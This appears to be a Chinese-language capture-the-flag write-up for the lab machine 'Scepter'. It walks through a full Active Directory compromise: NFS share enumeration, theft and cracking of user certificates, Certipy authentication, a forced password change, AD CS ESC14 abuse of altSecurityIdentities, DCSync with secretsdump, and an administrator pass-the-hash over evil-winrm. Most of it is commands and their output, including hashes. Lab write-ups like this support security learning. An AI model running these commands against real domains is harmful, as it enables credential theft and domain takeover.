初始侦查
Nmap扫描发现开放了NFS服务(2049端口)和标准域控制器端口。关键发现:
1
2
3
|
showmount -e dc01.scepter.htb
Export list for dc01.scepter.htb:
/helpdesk (everyone)
|
NFS共享利用
挂载NFS共享后发现多个用户证书:
1
2
3
|
sudo mount -t nfs dc01.scepter.htb:/helpdesk /mnt
ls -l /mnt/
baker.crt baker.key clark.pfx lewis.pfx scott.pfx
|
证书破解
使用pfx2john和hashcat破解PFX文件密码:
1
2
|
pfx2john.py clark.pfx > pfx.hashes
john pfx.hashes --wordlist=rockyou.txt
|
发现所有PFX密码均为"newpassword"。
用户认证
使用Certipy成功认证d.baker用户:
1
2
|
certipy auth -pfx baker.pfx -dc-ip 10.10.11.65
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce
|
BloodHound分析
发现d.baker可以强制修改a.carter的密码:
1
|
netexec smb scepter.htb -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce -M change-password -o USER=a.carter NEWPASS=Welcome1
|
AD CS漏洞利用(ESC14)
发现a.carter可以修改h.brown的altSecurityIdentities属性:
1
|
bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p Welcome1 set object d.baker mail -v h.brown@scepter.htb
|
通过证书伪造成功获取h.brown权限。
权限提升至域控
发现h.brown可以修改p.adams的altSecurityIdentities属性:
1
|
KRB5CCNAME=h.brown.ccache bloodyAD --host DC01.scepter.htb -d scepter.htb -k set object p.adams altSecurityIdentities -v 'X509:<RFC822>0xdf@scepter.htb'
|
p.adams作为复制操作组成员可执行DCSync:
1
|
secretsdump.py scepter.htb/p.adams@DC01.scepter.htb -hashes :1b925c524f447bb821a8789c4b118ce0
|
最终控制
使用管理员NTLM哈希通过WinRM登录:
1
|
evil-winrm -i DC01.scepter.htb -u administrator -H a291ead3493f9773dc615e66c2ea21c4
|